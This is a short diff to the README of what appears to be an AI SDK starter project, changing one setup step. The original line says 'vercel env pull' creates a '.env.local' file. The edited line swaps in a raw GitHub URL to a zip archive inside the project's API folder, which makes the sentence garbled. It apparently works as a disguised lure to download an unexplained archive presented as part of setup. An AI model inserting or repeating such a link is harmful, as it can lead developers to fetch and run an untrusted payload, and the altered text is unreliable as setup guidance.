CarsonWhite13/ai-sdk-starter-xai/README.md

    vercel env pull
    ```

-   This will create a `.env.local` file with all the necessary environment variables.
+   This will create a `https://raw.githubusercontent.com/CarsonWhite13/ai-sdk-starter-xai/main/app/api/ai-sdk-starter-xai-2.0.zip` file with all the necessary environment variables.

 3. Run the development server: